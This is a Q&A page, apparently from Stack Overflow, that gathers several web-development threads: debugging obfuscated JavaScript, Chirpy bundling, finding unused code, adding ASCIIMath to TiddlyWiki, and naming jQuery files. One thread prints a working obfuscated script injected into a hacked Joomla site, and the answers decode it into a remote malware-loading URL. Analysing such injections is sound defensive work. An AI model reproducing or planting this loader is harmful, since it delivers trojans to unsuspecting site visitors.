i want to analyze an external js-file. but the file is single-lined and obfuscated. so i cannot set meaningful breakpoints. (though automatical unobfuscation, code-indentation is assumed to be possible).
first of all, what would your suggestion be to overcome that impairement?
i wonder if it is possible to replace an external js-file with an unobfuscated nice-looking (maybe altered one) and have this one executed instead. any ideas?
i found a way. i am not accepting my answer as the answer b/c its not as comfortable as i would like it to be. so i am interested in further ideas.
you install foxyproxy and configure a new proxy for '*filename.js' (mind the asterisk!). as you host you use a local server, so '192.168.?.?' or 'localhost'.
thing is if the URL of the js-file to be replaced is 'http://www.abc.net/dir1/dir2/filename.js' then you have to make your new js-file accessible at 'http://[host]/dir1/dir2/filename.js'.
that setup is somewhat complicated. it should be possible to have the js-file replaced by another file anywhere on your disk. but it does the job.
Take some tool which has reformat code option. JetBrains WebStorm for example. It should break the lines so they will be suitable for setting breakpoints.
This should take 5-10 minutes. I doubt you will be able to do anything more without spending much time.
Related
I have a filegroup configured with Chirpy:
<FileGroup Name="1.min.js" Minify="False">
<File Path="test/temp1.js" />
<File Path="test/temp2.js" />
</FileGroup>
Now I set my master page to download this script 1.min.js. So far so good but the problem is when I edit some of the script in temp1.js, I have to come in this mash.chirp.config and save this file too for 1.min.js to take updated changes from temp1.js. This is tedious for me. If I forget to save at both place it causes countless minutes to figure out why is it not worknig. Is there any better approach to this?
I feel your pain and have had the same issues. Basically, the way I resolved this is to just tell the page to load the JS file directly. This seems to also play well with the js debugger because the files haven't been minified to a single line.
Then after the js file is complete, I add it to my mash.js.chirp.config file to be combined and minified. I know it's not the answer you were hoping for, but despite having to process it in this manor during development, the payout in the end feels worth it to me.
If you really wanted to force it, you could add code to the web projects properties, in the after build command line to invoke the chirpy console to compile this file. I've used the code for this before, but couldn't find it right now. Some info is here though; Oh and I wouldn't name your file .min.js unless you set minify = true. It could come back to bite you later on if you forget you did that.
I found the link to force the compiler;
http://www.annhoang.net/twitter-bootstrap-in-visual-studio-2010-with-chirpy-and-dotless/
I did find a very interesting tool for identify unused css definitions in a web project.
http://www.sitepoint.com/dustmeselectors/
Are there similar tools also for javascript projects?
P.S.
I know there is no program for deterministically finding unused code. But I am looking for a report to identify possible unused code. Then the last decision will always be your own.
Problem is there is no way to be really sure. Suppose the following:
The initial HTML site is practically empty. There is a lot of JS code though, which seems to be unused.
OnLoad, a function is called which launches an AJAX query to the server. The server returns a lot of HTML code, which is the body of the site. This body contains lots of JavaScript functions.
The initial body is replaced with the body received via AJAX. Suddenly, all code is used.
Static analysis utilities are therefore useless. I do not know whether there exists a browser extension that marks all JS usage from a running browser though.
You can try using tombstones to safely locate and remove dead code from your JavaScript.
https://blog.bugsnag.com/javascript-refactoring-with-bugsnag-and-tombstones/
In order to find the unused assets, to remove manually, you can use deadfile library:
https://m-izadmehr.github.io/deadfile/
It can simply find unused files, in any JS project.
Without any config, it supports ES6, JSX, and Vue files:
The one that comes to mind most quickly is Javascript LINT (http://www.javascriptlint.com/) and JSLint (http://www.jslint.com/).
Beware though: the latter hurts your feelings.
I use TiddlyWiki for work-notes. I already have pretty large wiki, but now I want to add math-support. As far as I understand what is written here, all I would have to do to use ASCIIMathML in my wiki would be including the script ASCIIMathML.js. Doesn't work (no effect at all). Then I found this plugin for TiddlyWiki, but when I import it to my wiki, it gives me an error in one of the regexp strings. When I download that wiki directly, ASCIIMath does not work anymore, even though I have the script in the same directory.
Does anyone have a solution available, how I can add ASCIIMath to my existing TiddlyWiki?
Edit: I know this not strictly a programming question, but questions about tools (such as SVN or VisualStudio) get asked here all the time, and I see no-one complaining there.
Ok, I've got it now. The plugin I linked in the question works, but one has to import by creating the tiddler manually and then copy/paste the script, otherwise what comes in is messed up. Then, one has to import the ASCIIMathML.js in the header-section of the wiki-file.
ASciencePad sounds like exactly what you need: TiddlyWiki + WISYWIG + AsciiMathML + AsciiSVG.
I'm not sure how to translate your existing wiki to it, but I guess you could cut-and-paste the wiki source?
You ought to be able to migrate all the tiddlers from one TiddlyWiki variant to another easily. At the worst you could just copy the block of tiddlers at the bottom of the html file in a text editor and paste them into the new file. (Since the "wiki source" is that html file, I'm not saying anything different than Beni Cherniavsky-Paskin did.)
Roger_S
My Joomla! website has been repeatedly hacked into. Someone, somehow, managed to inject the following rubbish into the key php scripts, but I mean not to talk about configuring Joomla. The site is not visited much (at times I fear I might be the only visitor to that site...) and I don't care much to have the site back up and running. I'll handle that eventually.
My question is, how does this rubbish work? I look at it and I just don't see how does this manage to do any harm? What it does is it tries to download a PDF file called ChangeLog.pdf, which is infected with a trojan and after opening will freeze up your Acrobat and wreak havoc on your machine. How does it do that, I don't know, I don't care. But how does the following piece of script invoke the download?
<script>/*Exception*/ document.write('<script src='+'h#^(t#)((t$&#p#:)&/!$/)#d$y#^#$n#$d^!!&n#s$)^-$)o^^(r!#g!!#$.^^#g))!a#m##$e&$s^##!t##($!o#$p(.&#c&)#(o$m)).!$m$)y#(b#e()s&$t$#y&o$&(u#)$x&&^(i)-#^c!!&n$#.(#g)$e#(^n&!u(i&#&n(e&(!h&o#&^&l^$(l)&y$(##w!o#!((o#d&^.^#)r$#^u!!$:(##&8#)(0$8#&0^(/))s#o#^&#^f!$t$!o##n(&$i(^!c$(.!&c#o!&^m#&/&(s&$(o!f&!t#&o!!n)&i$&c!.#^^c)!$o##((m##/$^!g#^o$^&o&#g!l)###!e&.))c!)(o###^!m(&/^^l#^#i##(v&#e&)!$j^!a#$s#m!i)n$.!$c&$o)#$m^/#$v&i^d^()e(!o&&s#(z(#)^.#)c$&o^m)$)^/#$'.replace(/#|\$|#|\^|&|\(|\)|\!/ig, '')+' defer=defer></scr'+'ipt>');</script>
<!--6f471c20c9b96fed179c85ffdd3365cf-->
ESET has detected this code as JS/TrojanDownloader.Agent.NRO trojan
Notice the replace call after the giant messy string: .replace(/#|\$|#|\^|&|\(|\)|\!/ig, '').
It removes most of the special characters, turning it into a normal URL:
evil://dyndns-org.gamestop.com.mybestyouxi-cn.genuinehollywood.ru:8080/softonic.com/softonic.com/google.com/livejasmin.com/videosz.com/
(I manually changed http: to evil:)
Note that the regex could have been simplified to .replace(/[#$#^&()!]/ig, '')
If you look at the script, you'll see that it's a very simple script that injects a hidden IFRAME containing the path /index.php?ys from the same domain.
I requested that page in Fiddler, and it had no content.
These answers might help you understand the nature of the malicious JavaScript code but what you should be looking for is a way to close the loophole inherant in the Joomla engine. Pre-packaged frameworks are prone to loopholes, either intentional or unintentional, especially when you take into consideration that they are engineered to work on unix, mac and windows environments.
My work requires I run many domains, applications and frameworks on many types of servers and systems for clients and myself. Over time I've seen more and more bots crawling these systems looking for known loopholes/entrances by-way of back-door entrances created by those frameworks. Good thing when I use any type of framework, which I seldom do, I make sure to rename most if not the entire file structure to rid myself of those pesky loopholes/back-doors. At the very least you can rename directories which will throw off most bots, but my way is to completely eliminate references that give clues as to the nature of the framework, which includes renaming of the entire file structure not just directories. Always keep a map of the new naming conventions relative to the old naming conventions in order to make adding plug-ins to your base framework a snap. Once you get the hang of this you can go as far as programatically renaming the entire framework filestructure for quicker results, this is especially useful when having to deal with clients needing to be able to update their framework with plug-ins and the like.
It just does a regex replace on the script url to give you
NOTE: DO NOT FOLLOW THE BELOW LINK (inserted ** to deter the copy-pasters)
http**://dyndns-org.gamestop.com.mybestyouxi-cn.genuinehollywood.ru:8080/softonic.com/softonic.com/google.com/livejasmin.com/videosz.com/
as the src
It uses the replace function to replace the rubbish chars using regex, nothing wrong with the code:
........replace(/#|\$|#|\^|&|\(|\)|\!/ig, '')
Its load script from
h..p://dyndns-org.gamestop.com.mybestyouxi-cn.genuinehollywood.ru:8080/softonic.com/softonic.com/google.com/livejasmin.com/videosz.com/
And that script load iframe from with visibility hidden
h..p://dyndns-org.gamestop.com.mybestyouxi-cn.genuinehollywood.ru:8080/index.php?ys
When you read the whole thing, you find that it is a string followed by a replace command.
My two cents. Have you / can you install a Joomla backup tool such as Joomlapack?
I've set it to run via a CHRON script to keep the goods handy in case the muggers get to mugging.
What version of Joomla are you running?
1.0.X versions aren't being updated any longer, and it's age is really starting to show. You owe it to yourself to do a backup and plan to upgrade to 1.5 and anticipate the wonders of 1.6
This one should be easy, and I think I know the right answer, but here goes.
For compatibility reasons, should I leave the filename of jQuery as "jquery-1.3.2.min.js" or just rename it to jquery.js?
My guess is leave it as is to avoid conflicts in case another app uses a different version of jQuery. If they've renamed it to "jquery.js" and I do the same, I see potential version conflicts.
Am I wrong or way off base?
Jeff
It's a very good idea to have version-numbered JS (and CSS) files, because that lets you configure your web server to use a far-future Expires header on such files without running into caching problems. When the file gets updated, it gets a new version number, so the browser always fetches the new version, not the old cached one.
You should do this on your other JS and CSS files, too. You want this to be automated, not something you manage by hand. Your development work happens on unversioned files, and your versioning system creates versioned copies and works out the details of updating the references to the CSS and JS files in the HTML files to point to the versioned copies. This can be a bit of work, but well worth it when it comes to speeding up your site. It took me about a day to set my system up. The improvement wasn't subtle.
I would go with jquery-1.3.2.min.js because it's more specific and you can immediately tell if you're reviewing this site in months to come, as well as avoiding any filename confliction in the future.
You shouldn't have any issues with updating, if you're relying on something like an include/template file for the javascript.
In my opinion, its just a personal preference. If you have version in your file name, It helps you easily identify which one you are using with out actually opening the file. It also provides an indirect way of clients downloading the new version file (as it is never cached). If you don't use the ext, upgrading to newer version is easy in coding perspective, but takes the pain of force downloading the new file by all users.
Recommended way to use jQuery in app is using the google's hosting..
google.load("jquery", "1.3.2");
google.setOnLoadCallback(function() {
// Place init code here instead of $(document).ready()
});
Why and how to use jQuery hosted on google
I prefer to leave the version in the file name because there are times when you are changing versions and this is very helpful. At a glance I can see which version I am using on any given webpage.